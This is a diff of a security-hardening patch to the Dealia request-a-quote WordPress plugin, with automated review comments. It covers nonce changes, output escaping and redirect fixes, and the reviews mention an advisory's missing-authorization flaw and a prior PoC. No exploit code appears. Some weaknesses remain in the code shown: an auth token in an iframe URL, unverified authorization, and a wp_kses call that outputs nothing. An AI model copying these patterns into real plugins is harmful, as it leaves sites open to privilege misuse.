 		if ( isset( $query_vars['like_name'] ) && !empty( $query_vars['like_name'] ) ) {
--- a/dealia-request-a-quote/src/Services/DealiaApi/ApiService.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/ApiService.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaLibraryApiRequest;
 use DealiaServicesOptions;
 use DealiaServicesService;
--- a/dealia-request-a-quote/src/Services/DealiaApi/Forms.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/Forms.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaLibraryApiRequest;

 class Forms extends ApiService {
@@ -21,7 +23,6 @@

 		try {
 			$forms = $this->make_get_request('/catalog/forms/list',[
-				//'limit' => 1,
 				'offset' => 0,
 			]);
 		} catch (Exception $exception) {
--- a/dealia-request-a-quote/src/Services/DealiaApi/Integration.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/Integration.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use stdClass;

 class Integration extends ApiService {
--- a/dealia-request-a-quote/src/Services/DealiaApi/Products.php
+++ b/dealia-request-a-quote/src/Services/DealiaApi/Products.php
@@ -2,6 +2,8 @@

 namespace DealiaServicesDealiaApi;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class Products extends ApiService {

 	public function __construct() {
--- a/dealia-request-a-quote/src/Services/Options.php
+++ b/dealia-request-a-quote/src/Services/Options.php
@@ -2,6 +2,7 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
 class Options extends Service {
 	const DEALIA_OPTIONS_KEY = 'dealia_options';
 	private $required_options_keys = [
--- a/dealia-request-a-quote/src/Services/Service.php
+++ b/dealia-request-a-quote/src/Services/Service.php
@@ -2,6 +2,8 @@

 namespace DealiaServices;

+if (!defined('ABSPATH')) exit;
+
 abstract class Service {

 }
--- a/dealia-request-a-quote/src/Services/View.php
+++ b/dealia-request-a-quote/src/Services/View.php
@@ -2,6 +2,8 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class View extends Service {
 	public static function render($template_path, $params = array(), $allowed_keys = array(), $prefix = "")
 	{
--- a/dealia-request-a-quote/templates/footer/part-woocommerce.php
+++ b/dealia-request-a-quote/templates/footer/part-woocommerce.php
@@ -1,19 +1,18 @@
-<?php if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-$options_set           = ( ! empty( $options_set ) ? $options_set : false );
-$access_token_set      = ( ! empty( $access_token_set ) ? $access_token_set : false );
-$is_woocommerce_active = ( ! empty( $is_woocommerce_active ) ? $is_woocommerce_active : false );
-$hide_add_to_cart      = ( ! empty( $hide_add_to_cart ) ? $hide_add_to_cart : false );
-$hide_prices           = ( ! empty( $hide_prices ) ? $hide_prices : false );
-$forms                 = ( ! empty( $forms ) ? $forms : array() );
+<?php if ( ! defined( 'ABSPATH' ) ) exit;
+
+$dealia_options_set           = ( ! empty( $dealia_options_set ) ? $dealia_options_set : false );
+$dealia_access_token_set      = ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false );
+$dealia_is_woocommerce_active = ( ! empty( $dealia_is_woocommerce_active ) ? $dealia_is_woocommerce_active : false );
+$dealia_hide_add_to_cart      = ( ! empty( $dealia_hide_add_to_cart ) ? $dealia_hide_add_to_cart : false );
+$dealia_hide_prices           = ( ! empty( $dealia_hide_prices ) ? $dealia_hide_prices : false );
+$dealia_forms                 = ( ! empty( $dealia_forms ) ? $dealia_forms : array() );
 ?>

 <div class="d-icons woo-ico-d"></div>
 <h3><?php esc_attr_e( 'Settings for WooCommerce', 'dealia-request-a-quote' ); ?></h3>

-<?php if ( $is_woocommerce_active ): ?>
-	<?php if ( ! $options_set || ! $access_token_set ): ?>
+<?php if ( $dealia_is_woocommerce_active ): ?>
+	<?php if ( ! $dealia_options_set || ! $dealia_access_token_set ): ?>
         <p><?php esc_attr_e( 'Your Dealia account is not set up yet. Please connect it to get started.', 'dealia-request-a-quote' ); ?></p>
 	<?php else: ?>
         <p><?php esc_attr_e( 'Please configure options for your store:', 'dealia-request-a-quote' ); ?></p>
@@ -31,7 +30,7 @@
                                 placeholder=""
                                 class="text-input dealia-form-input"
                                 value="all"
-							<?php if ( ! empty( $products_covered ) && $products_covered === 'all' ): ?> checked <?php endif; ?>
+							<?php if ( ! empty( $dealia_products_covered ) && $dealia_products_covered === 'all' ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-all-products" class="dealia-field-label">
 							<?php esc_attr_e( 'All products', 'dealia-request-a-quote' ); ?>
@@ -40,16 +39,16 @@

                     <div
                             id="dealia-forms-block"
-                            class="<?php if ( empty( $products_covered ) || $products_covered !== 'all' ): ?> dealia-hidden <?php endif; ?>"
+                            class="<?php if ( empty( $dealia_products_covered ) || $dealia_products_covered !== 'all' ): ?> dealia-hidden <?php endif; ?>"
                     >

                         <label for="dealia-forms" class="dealia-field-label">Form:</label>
                         <select id="dealia-forms" name="form_for_all_products">
-							<?php foreach ( $forms as $form ): ?>
+							<?php foreach ( $dealia_forms as $dealia_form ): ?>
                                 <option
-									<?php if ( ! empty( $form_for_all_products ) && $form_for_all_products === $form['value'] ): ?> selected <?php endif; ?>
-                                        value="<?php dealia_escape_echo( $form['value'] ); ?>">
-									<?php dealia_escape_echo( $form['label'] ); ?>
+									<?php if ( ! empty( $dealia_form_for_all_products ) && $dealia_form_for_all_products === $dealia_form['value'] ): ?> selected <?php endif; ?>
+                                        value="<?php dealia_escape_echo( $dealia_form['value'] ); ?>">
+									<?php dealia_escape_echo( $dealia_form['label'] ); ?>
                                 </option>
 							<?php endforeach; ?>
                         </select>
@@ -63,7 +62,7 @@
                                 placeholder=""
                                 class="text-input dealia-form-input"
                                 value="selected"
-							<?php if ( ! empty( $products_covered ) && $products_covered === 'selected' ): ?> checked <?php endif; ?>
+							<?php if ( ! empty( $dealia_products_covered ) && $dealia_products_covered === 'selected' ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-selected-products" class="dealia-field-label">
 							<?php esc_attr_e( 'Selected products', 'dealia-request-a-quote' ); ?>
@@ -82,7 +81,7 @@
                                 name="hide_addtocart"
                                 placeholder=""
                                 class="text-input dealia-form-input"
-							<?php if ( $hide_add_to_cart ): ?> checked <?php endif; ?>
+							<?php if ( $dealia_hide_add_to_cart ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-hide-addtocart" class="dealia-field-label">
 							<?php esc_attr_e( 'Hide "Add to Cart" button', 'dealia-request-a-quote' ); ?>
@@ -95,7 +94,7 @@
                                 name="hide_price"
                                 placeholder=""
                                 class="text-input dealia-form-input"
-							<?php if ( $hide_prices ): ?> checked <?php endif; ?>
+							<?php if ( $dealia_hide_prices ): ?> checked <?php endif; ?>
                         />
                         <label for="dealia-hide-price" class="dealia-field-label">
 							<?php esc_attr_e( 'Hide prices', 'dealia-request-a-quote' ); ?>
--- a/dealia-request-a-quote/templates/footer/part-wordpress.php
+++ b/dealia-request-a-quote/templates/footer/part-wordpress.php
@@ -1,6 +1,5 @@
-<?php if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-} ?>
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <h1 class="white-text-d"><?php esc_attr_e( 'Dealia for Wordpress', 'dealia-request-a-quote' ); ?></h1>
 <div>
     <div class="white-text-d"><p>Add the “Request a Quote” Button to Your WordPress Pages & Posts.</p>
--- a/dealia-request-a-quote/templates/generic-iframe-page.php
+++ b/dealia-request-a-quote/templates/generic-iframe-page.php
@@ -1,15 +1,15 @@
 <?php
-if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+if ( ! defined( 'ABSPATH' ) ) exit;

-$_token = (!empty($access_token)) ? $access_token : false;
-$_dealia_page = (!empty($dealia_page)) ? $dealia_page : false;
+$dealia_token = (!empty($dealia_access_token)) ? $dealia_access_token : false;
+$dealia_page = (!empty($dealia_page)) ? $dealia_page : false;
 ?>

-<?php if($_token && $_dealia_page): ?>
+<?php if($dealia_token && $dealia_page): ?>

 	<div id="dealia-page-container" class="dealia-page-content dealia-page-forms" style="margin:0px;padding:0px;overflow:hidden;height:700px;">
 		<iframe
-			src="<?php dealia_escape_echo(DEALIA_SITE_ADMIN_URL . "/DealiaAdmin.html#" . $_dealia_page . "?authtoken=" . $_token . '&nocontrol=1'); ?>"
+			src="<?php dealia_escape_echo(DEALIA_SITE_ADMIN_URL . "/DealiaAdmin.html#" . $dealia_page . "?authtoken=" . $dealia_token . '&nocontrol=1'); ?>"
 			frameborder="0"
 			style="overflow:hidden;height:100%;width:100%" height="100%" width="100%"
 		>
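Review bot: `$dealia_token` still ends up in the iframe `src` through `dealia_escape_echo()`, and this is a URL in an attribute context where the WordPress-standard call is `esc_url()`; please confirm `dealia_escape_echo()` both escapes quotes for the attribute and leaves the `#`, `?` and `&` of `"/DealiaAdmin.html#" . $dealia_page . "?authtoken=" . $dealia_token` intact, otherwise the embedded admin page breaks. Also `$dealia_page = (!empty($dealia_page)) ? $dealia_page : false;` now assigns the variable to itself, which reads like a leftover from the rename; a short comment that it only normalizes an unset value would help.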
@@ -17,6 +17,6 @@
 	</div>

 <?php else:
-    wp_redirect( admin_url('admin.php?page=dealia') );
-    exit;
+    wp_safe_redirect( admin_url('admin.php?page=dealia') );
+    exit();
  endif; ?>
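Review bot: wp_safe_redirect() is the right call here; with admin_url() as the target it behaves exactly like wp_redirect() did, so this is hardening with no functional change. Minor: `exit()` with parentheses is inconsistent with the bare `exit;` used in every other template in this patch, pick one form.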
--- a/dealia-request-a-quote/templates/main-page-header.php
+++ b/dealia-request-a-quote/templates/main-page-header.php
@@ -1,7 +1,6 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+<?php $dealia_all_set = (!empty($dealia_all_set)) ? $dealia_all_set : false; ?>
 <div class="dealiaintro">
-
-
 	<div class="text-img-cont-d">
         <div class="text-intro-cont-d">
             <h2>	<b class="dealiahighlight">Dealia</b> - embed custom buttons and forms anywhere on your website </h2>
@@ -10,7 +9,7 @@
                 <li>Add a 'Request a Quote' button to any content or product page to receive multi-item or single-item quotes.</li>
                 <li>Create unlimited forms and assign them anywhere on your site. </li>
                 <li>Optionally negotiate prices, close deals seamlessly, and get paid - all in one place. </li>
-                <?php if( ! empty($all_set) ): ?>
+                <?php if( ! empty($dealia_all_set) ): ?>
                     <li>The <a href="/wp-admin/admin.php?page=dealia-billing" >Paid plan</a> is <b class="dealiahighlight">unlimited</b>, whereas the Free plan allows for <b class="dealiahighlight">10</b> quotes.</li>
                 <?php endif;?>
             </ul>
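Review bot: the 'Paid plan' link in this hunk is still hard-coded to `/wp-admin/admin.php?page=dealia-billing`, which breaks on installs where WordPress lives in a subdirectory or uses a custom admin path; the other templates already build admin links with admin_url(), so `href="<?php echo esc_url( admin_url( 'admin.php?page=dealia-billing' ) ); ?>"` would be consistent. The surrounding list items are also untranslated English while the rest of the page uses esc_html_e().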
--- a/dealia-request-a-quote/templates/main-page-steps-footer.php
+++ b/dealia-request-a-quote/templates/main-page-steps-footer.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div class="dealia-get-started">
 	<div class="d-icon-cont">
 	<h1><?php esc_html_e( "Get started with Dealia!", 'dealia-request-a-quote' ); ?></h1>
@@ -13,64 +14,44 @@
 		<div class="daSteps daSteps-wide d-woo">
 			<div class="daSteps-inner woo-set-cont">
 				<?php dealia_template_echo('footer/part-woocommerce.php', [
-					'options_set' => (!empty($options_set) ? $options_set : false),
-					'access_token_set' => (!empty($access_token_set) ? $access_token_set : false),
-					'is_woocommerce_active' => (!empty($is_woocommerce_active) ? $is_woocommerce_active : false),
-					'hide_add_to_cart' => (!empty($hide_add_to_cart) ? $hide_add_to_cart : false),
-					'hide_prices' => (!empty($hide_prices) ? $hide_prices : false),
-					'forms' => (!empty($forms) ? $forms : array()),
-					'form_for_all_products' => (!empty($form_for_all_products) ? $form_for_all_products : ""),
-					'products_covered' => (!empty($products_covered) ? $products_covered : 'selected'),
+					'dealia_options_set' => (!empty($dealia_options_set) ? $dealia_options_set : false),
+					'dealia_access_token_set' => (!empty($dealia_access_token_set) ? $dealia_access_token_set : false),
+					'dealia_is_woocommerce_active' => (!empty($dealia_is_woocommerce_active) ? $dealia_is_woocommerce_active : false),
+					'dealia_hide_add_to_cart' => (!empty($dealia_hide_add_to_cart) ? $dealia_hide_add_to_cart : false),
+					'dealia_hide_prices' => (!empty($dealia_hide_prices) ? $dealia_hide_prices : false),
+					'dealia_forms' => (!empty($dealia_forms) ? $dealia_forms : array()),
+					'dealia_form_for_all_products' => (!empty($dealia_form_for_all_products) ? $dealia_form_for_all_products : ""),
+					'dealia_products_covered' => (!empty($dealia_products_covered) ? $dealia_products_covered : 'selected'),
 				]); ?>
 			</div>

-
-
 			<div class="help-cont-d daSteps-inner">

-			<div class="d-icons help-ico-d"> </div>
-
-			<h3>Support</h3>
-
-	<p class="woo-set">
-		<?php esc_html_e("All features offered by our platform are described in our", 'dealia-request-a-quote'); ?>
-		<b>
-			<a class="dealiahighlight"
-				href="https://dealia.com/help/"
-				target="_blank">
-				<?php esc_html_e("Help Center", 'dealia-request-a-quote'); ?>
-			</a>
-		</b>.
-	</p>
-	<p class="woo-set">
-		Do you have any questions? Feel free to
-		<b>
-			<a class="dealiahighlight"
-			   href="https://dealia.com/contact"
-	           target="_blank">
-				<?php esc_html_e("Contact Us", 'dealia-request-a-quote'); ?>
-			</a>
-		</b>.
-	</p>
-
-	</div>
-
+                <div class="d-icons help-ico-d"> </div>

+                <h3>Support</h3>

+                <p class="woo-set">
+                    <?php esc_html_e("All features offered by our platform are described in our", 'dealia-request-a-quote'); ?>
+                    <b>
+                        <a class="dealiahighlight"
+                            href="https://dealia.com/help/"
+                            target="_blank">
+                            <?php esc_html_e("Help Center", 'dealia-request-a-quote'); ?>
+                        </a>
+                    </b>.
+                </p>
+                <p class="woo-set">
+                    Do you have any questions? Feel free to
+                    <b>
+                        <a class="dealiahighlight"
+                           href="https://dealia.com/contact"
+                           target="_blank">
+                            <?php esc_html_e("Contact Us", 'dealia-request-a-quote'); ?>
+                        </a>
+                    </b>.
+                </p>
+        	</div>
 		</div>
-
-
-
-
-
-
-
-
-
 	</div>
-
-
-
-
-
 </div>
--- a/dealia-request-a-quote/templates/main-page.php
+++ b/dealia-request-a-quote/templates/main-page.php
@@ -1,6 +1,5 @@
-<?php if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-} ?>
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-loader-wrapper" class="dealia-loader-wrapper dealia-hidden">
     <div class="dealia-loader dealia-text-primary">
     </div>
@@ -8,10 +7,10 @@

 <div class="top-dash-items-d">

-	<?php dealia_template_echo( 'main-page-header.php', ['all_set' => (! empty( $options_set ) && $options_set)] ); ?>
+	<?php dealia_template_echo( 'main-page-header.php', ['dealia_all_set' => (! empty( $dealia_options_set ) && $dealia_options_set)] ); ?>
+
+    <?php wp_nonce_field( 'dealia_admin_nonce', 'dealia_nonce');  ?>

-    <input type="hidden" id="dealia_nonce"
-           value="<?php dealia_escape_echo( wp_create_nonce( DEALIA_ADMIN_NONCE ) ); ?>"/>
     <input type="hidden" id="dealia_admin_ajax" value="<?php dealia_escape_echo( admin_url( 'admin-ajax.php' ) ); ?>"/>

     <div class="wrap dealiaformwrap">
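Review bot: replacing the hidden input with wp_nonce_field( 'dealia_admin_nonce', 'dealia_nonce' ) changes both the nonce action (from the DEALIA_ADMIN_NONCE constant to the literal 'dealia_admin_nonce') and the request field (from the `_wpnonce` parameter the old PoC sends to `dealia_nonce`), so every handler in AdminSettingsController must now verify with that action string and read that field name; the handler side is not in this diff, please confirm it was updated in the same release. Separately, a nonce is only a CSRF token and not the fix for the advisory's missing-authorization issue: each admin handler still needs `current_user_can( 'manage_options' )`, because admin-ajax.php is reachable by any logged-in user regardless of which page rendered the field.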
@@ -20,20 +19,20 @@
             <img class="dealiaicon" src="<?php echo esc_url( DEALIA_PLUGIN_URL . 'assets/images/dealiaicon.png' ); ?>">
         </div>

-        <?php if ( empty( $access_token_set ) ): ?>
+        <?php if ( empty( $dealia_access_token_set ) ): ?>
             <h3>
                 <?php esc_html_e( 'First, connect your Dealia account:', 'dealia-request-a-quote' ); ?>
             </h3>
         <?php endif; ?>

-		<?php if ( ! empty( $options_set ) && $options_set ): ?>
+		<?php if ( ! empty( $dealia_options_set ) && $dealia_options_set ): ?>
 			<?php dealia_template_echo( 'steps/step_final_allset.php', [
-				'access_token_set' => ( ! empty( $access_token_set ) ? $access_token_set : false ),
-                'is_permalink_supported' => (! empty( $is_permalink_supported ) ? $is_permalink_supported : false ),
+				'dealia_access_token_set' => ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false ),
+                'dealia_is_permalink_supported' => (! empty( $dealia_is_permalink_supported ) ? $dealia_is_permalink_supported : false ),
 			] ); ?>
 		<?php else: ?>
 			<?php dealia_template_echo( 'steps/step1_select_setup_variants.php', [
-                    'countries_list' => ( ! empty( $countries_list ) ? $countries_list : [] ),
+                    'dealia_countries_list' => ( ! empty( $dealia_countries_list ) ? $dealia_countries_list : [] ),
             ]); ?>
 		<?php endif; ?>
     </div>
@@ -41,13 +40,13 @@
 </div>

 <?php dealia_template_echo( 'main-page-steps-footer.php', [
-	'options_set'           => ( ! empty( $options_set ) ? $options_set : false ),
-	'access_token_set'      => ( ! empty( $access_token_set ) ? $access_token_set : false ),
-	'is_woocommerce_active' => ( ! empty( $is_woocommerce_active ) ? $is_woocommerce_active : false ),
-	'hide_add_to_cart'      => ( ! empty( $hide_add_to_cart ) ? $hide_add_to_cart : false ),
-	'hide_prices'           => ( ! empty( $hide_prices ) ? $hide_prices : false ),
-	'forms'                 => ( ! empty( $forms ) ? $forms : array() ),
-	'form_for_all_products' => ( ! empty( $form_for_all_products ) ? $form_for_all_products : "" ),
-	'products_covered'      => ( ! empty( $products_covered ) ? $products_covered : 'selected' ),
+	'dealia_options_set'           => ( ! empty( $dealia_options_set ) ? $dealia_options_set : false ),
+	'dealia_access_token_set'      => ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false ),
+	'dealia_is_woocommerce_active' => ( ! empty( $dealia_is_woocommerce_active ) ? $dealia_is_woocommerce_active : false ),
+	'dealia_hide_add_to_cart'      => ( ! empty( $dealia_hide_add_to_cart ) ? $dealia_hide_add_to_cart : false ),
+	'dealia_hide_prices'           => ( ! empty( $dealia_hide_prices ) ? $dealia_hide_prices : false ),
+	'dealia_forms'                 => ( ! empty( $dealia_forms ) ? $dealia_forms : array() ),
+	'dealia_form_for_all_products' => ( ! empty( $dealia_form_for_all_products ) ? $dealia_form_for_all_products : "" ),
+	'dealia_products_covered'      => ( ! empty( $dealia_products_covered ) ? $dealia_products_covered : 'selected' ),
 ] ); ?>

--- a/dealia-request-a-quote/templates/steps/step1_select_setup_variants.php
+++ b/dealia-request-a-quote/templates/steps/step1_select_setup_variants.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-setup-options" class="dealia-setup-options">
 	<div id="dealia-register" class="option margin-bottom-d">Sign up</div>
 <div class="margin-bottom-d">	OR </div>
@@ -11,7 +12,7 @@

 		</div>
 		<?php dealia_template_echo('steps/step2_register.php', [
-                'countries_list' => ( ! empty( $countries_list ) ? $countries_list : [] ),
+                'dealia_countries_list' => ( ! empty( $dealia_countries_list ) ? $dealia_countries_list : [] ),
         ]); ?>
 	</div>
 	<div id="dealia-lodin-block" class="dealia-action dealia-hidden">
--- a/dealia-request-a-quote/templates/steps/step2_register.php
+++ b/dealia-request-a-quote/templates/steps/step2_register.php
@@ -1,14 +1,15 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <?php
-if( ! empty( $countries_list ) ) {
-    $country_column = [];
-    $currency_column = [];
-    foreach ($countries_list as $key => $row) {
-        $country_column[$row['country_code']] = $row['country'];
-        $currency_column[$row['currency_code']] = $row['currency_name'];
+if( ! empty( $dealia_countries_list ) ) {
+    $dealia_country_column = [];
+    $dealia_currency_column = [];
+    foreach ($dealia_countries_list as $dealia_key => $dealia_row) {
+        $dealia_country_column[$dealia_row['country_code']] = $dealia_row['country'];
+        $dealia_currency_column[$dealia_row['currency_code']] = $dealia_row['currency_name'];
     }
-    asort($country_column);
-    asort($currency_column);
+    asort($dealia_country_column);
+    asort($dealia_currency_column);
 }
 ?>

@@ -60,11 +61,15 @@
 				</th>
 				<td>
 					<select id="dealia_country" class="dealia-form-input" name="dealia_options[dealia_country]">
-                        <?php if( ! empty( $country_column )): ?>
-                            <?php foreach ($country_column as $key => $value): ?>
-                                <option <?php if ($key === "US"): ?> selected <?php endif; ?> value="<?php echo $key; ?>"><?php echo $value; ?></option>
+                        <?php if( ! empty( $dealia_country_column )): ?>
+                            <?php foreach ($dealia_country_column as $dealia_key => $dealia_value): ?>
+                                <option
+                                        <?php if ($dealia_key === "US"): ?> selected <?php endif; ?>
+                                        value="<?php dealia_escape_echo( $dealia_key ); ?>">
+                                    <?php dealia_escape_echo( $dealia_value ); ?>
+                                </option>
                             <?php endforeach;?>
-                            <?php unset($key, $value); ?>
+                            <?php unset($dealia_key, $dealia_value); ?>
                         <?php endif;?>
 					</select>
 				</td>
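Review bot: good catch replacing the raw `echo $key` / `echo $value` with `dealia_escape_echo()`; whatever populates `$dealia_countries_list`, this was an unescaped output path into both an attribute and a text node. `dealia_escape_echo()` is now used for both the `value="..."` attribute and the option text; verify it escapes correctly for both contexts (esc_attr versus esc_html), or use `esc_attr()` and `esc_html()` directly so the intent is visible at the call site.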
@@ -77,11 +82,15 @@
 				</th>
 				<td>
 					<select id="dealia_currency" class="dealia-form-input" name="dealia_options[dealia_currency]">
-                        <?php if( ! empty( $currency_column )): ?>
-                            <?php foreach ($currency_column as $key => $value): ?>
-                                <option <?php if ($key === "USD"): ?> selected <?php endif; ?> value="<?php echo $key; ?>"><?php echo $value . " ( $key )"; ?></option>
+                        <?php if( ! empty( $dealia_currency_column )): ?>
+                            <?php foreach ($dealia_currency_column as $dealia_key => $dealia_value): ?>
+                                <option
+                                        <?php if ($dealia_key === "USD"): ?> selected <?php endif; ?>
+                                        value="<?php dealia_escape_echo( $dealia_key); ?>">
+                                    <?php dealia_escape_echo( $dealia_value . " ( $dealia_key )"); ?>
+                                </option>
                             <?php endforeach;?>
-                            <?php unset($key, $value); ?>
+                            <?php unset($dealia_key, $dealia_value); ?>
                         <?php endif;?>
 					</select>
 				</td>
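Review bot: same point as the country select: escaping the currency option is the right fix, and building `$dealia_value . " ( $dealia_key )"` before passing it to `dealia_escape_echo()` is fine as long as that helper is an HTML escaper. The `unset($dealia_key, $dealia_value)` after the loop is harmless but unnecessary now that the names are prefixed and no longer collide with anything.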
--- a/dealia-request-a-quote/templates/steps/step3_login.php
+++ b/dealia-request-a-quote/templates/steps/step3_login.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-form-login" class="dealia-form">
 	<div class="dealia-form-errors errors"></div>
 	<table class="form-table" role="presentation">
--- a/dealia-request-a-quote/templates/steps/step_final_allset.php
+++ b/dealia-request-a-quote/templates/steps/step_final_allset.php
@@ -1,10 +1,10 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit;

-$access_token_set = ( ! empty( $access_token_set ) ? $access_token_set : false );
-$permalink_supported = (!empty($is_permalink_supported)) ? $is_permalink_supported : false;
+$dealia_access_token_set = ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false );
+$dealia_permalink_supported = (!empty($dealia_is_permalink_supported)) ? $dealia_is_permalink_supported : false;
 ?>
 <div class="setup-options">
-	<?php if ( !$access_token_set ): ?>
+	<?php if ( !$dealia_access_token_set ): ?>
 	<div class="notice warning settings-error is-dismissible">
 		<p>
 			<strong class="error-message"><?php esc_html_e("Your email is not verified yet. Please use the link sent to your mailbox for verification. Then refresh to sync the integration", 'dealia-request-a-quote'); ?></strong>
@@ -18,7 +18,7 @@

 	<div class="d-icons thumbs-ico-d"> </div>
 		<p class="padding-bottom-d">
-            <?php if ( $access_token_set): ?>
+            <?php if ( $dealia_access_token_set): ?>
 	            <?php esc_html_e("Account is now connected and verified.", 'dealia-request-a-quote'); ?>
             <?php else: ?>
 	            <?php esc_html_e("Account connected", 'dealia-request-a-quote'); ?>
@@ -30,7 +30,7 @@
 	</div>
 </div>

-<?php if ( $access_token_set && !$permalink_supported ): ?>
+<?php if ( $dealia_access_token_set && !$dealia_permalink_supported ): ?>
     <style>
         #dealia-support-message {
             margin-top: 25px;
--- a/dealia-request-a-quote/templates/widgets/dealia-nonproduct-button.php
+++ b/dealia-request-a-quote/templates/widgets/dealia-nonproduct-button.php
@@ -1,19 +1,20 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
-<?php if (!empty($params)): ?>
+
+<?php if (!empty($dealia_params)): ?>
 <div>
 	<button
 		id="dealia_button_<?php dealia_escape_echo(time()); ?>"
 		contenteditable="false"
-		itemform="<?php dealia_escape_echo($params['form_name']); ?>"
-		itemname="<?php dealia_escape_echo($params['name']); ?>"
-		itemimage="<?php dealia_escape_echo($params['image_url']); ?>"
-		itemcolor="<?php dealia_escape_echo($params['button_color']); ?>"
-		data-itemform="<?php dealia_escape_echo($params['form_name']); ?>"
-		data-itemname="<?php dealia_escape_echo($params['name']); ?>"
-		data-itemimage="<?php dealia_escape_echo($params['image_url']); ?>"
-		data-itemcolor="<?php dealia_escape_echo($params['button_color']); ?>"
+		itemform="<?php dealia_escape_echo($dealia_params['form_name']); ?>"
+		itemname="<?php dealia_escape_echo($dealia_params['name']); ?>"
+		itemimage="<?php dealia_escape_echo($dealia_params['image_url']); ?>"
+		itemcolor="<?php dealia_escape_echo($dealia_params['button_color']); ?>"
+		data-itemform="<?php dealia_escape_echo($dealia_params['form_name']); ?>"
+		data-itemname="<?php dealia_escape_echo($dealia_params['name']); ?>"
+		data-itemimage="<?php dealia_escape_echo($dealia_params['image_url']); ?>"
+		data-itemcolor="<?php dealia_escape_echo($dealia_params['button_color']); ?>"
 		class="daQuoteBtn daManualBtn daBtnGeneral daNonBtnClass"
-		style="background-color:<?php dealia_escape_echo($params['button_color']); ?>;"
-	><?php dealia_escape_echo($params['button_text']); ?></button>
+		style="background-color:<?php dealia_escape_echo($dealia_params['button_color']); ?>;"
+	><?php dealia_escape_echo($dealia_params['button_text']); ?></button>
 </div>
 <?php endif; ?>
--- a/dealia-request-a-quote/templates/widgets/post-edit-legacy.php
+++ b/dealia-request-a-quote/templates/widgets/post-edit-legacy.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-loader-wrapper" class="dealia-loader-wrapper dealia-hidden">
 	<div class="dealia-loader dealia-text-primary">
 	</div>
@@ -18,7 +19,7 @@
 		<div class="media-modal-content" role="document">

 			<div class="wrap">
-                <?php wp_nonce_field( DEALIA_ADMIN_NONCE, DEALIA_ADMIN_NONCE ); ?>
+                <?php wp_nonce_field( 'dealia_post_nonce', 'nonce');  ?>

 				<h1>
 					<?php esc_attr_e( 'Dealia button configuration', 'dealia-request-a-quote' ); ?>
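Review bot: this hunk is the one that removes the admin nonce from the post editor: the legacy widget now emits a token for the separate 'dealia_post_nonce' action instead of DEALIA_ADMIN_NONCE, so a Contributor no longer receives a value that the admin handlers would accept. Two follow-ups: the field name 'nonce' is generic and can collide with other plugins' fields on the same edit screen (the admin page uses 'dealia_nonce'; a prefixed name such as 'dealia_post_nonce' would be consistent), and the post-side handlers must verify 'dealia_post_nonce' and still check the post capability, since splitting the nonces by itself adds no authorization.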
--- a/dealia-request-a-quote/templates/widgets/product-edit-widget.php
+++ b/dealia-request-a-quote/templates/widgets/product-edit-widget.php
@@ -1,11 +1,11 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit;

-$all_products_enabled = (!empty($all_products_enabled)) ? $all_products_enabled : false;
-$all_products_enabled_val = ($all_products_enabled)? 1 : 0;
-$current_form_id = (!empty($current_form)) ? $current_form : 0;
-$permalink_supported = (!empty($is_permalink_supported)) ? $is_permalink_supported : false;
+$dealia_all_products_enabled = (!empty($dealia_all_products_enabled)) ? $dealia_all_products_enabled : false;
+$dealia_all_products_enabled_val = ($dealia_all_products_enabled)? 1 : 0;
+$dealia_current_form_id = (!empty($dealia_current_form)) ? $dealia_current_form : 0;
+$dealia_permalink_supported = (!empty($dealia_is_permalink_supported)) ? $dealia_is_permalink_supported : false;
 ?>
-<?php if(!$permalink_supported): ?>
+<?php if(!$dealia_permalink_supported): ?>
     <div id="dealia-support-message" class="notice notice-warning">
         <p>
             <?php esc_attr_e('Your permalinks type is not supported by Dealia. Please change or visit our ', 'dealia-request-a-quote'); ?>
@@ -21,8 +21,8 @@

 <?php else: ?>

-    <?php if (!empty($forms)): ?>
-        <input type="hidden" name="dealia_app_products_enabled" value="<?php wp_kses( $all_products_enabled_val, []); ?>" />
+    <?php if (!empty($dealia_forms)): ?>
+        <input type="hidden" name="dealia_app_products_enabled" value="<?php wp_kses( $dealia_all_products_enabled_val, []); ?>" />
         <div class="row">
             <input
                 id="dealia-field-dealia_active"
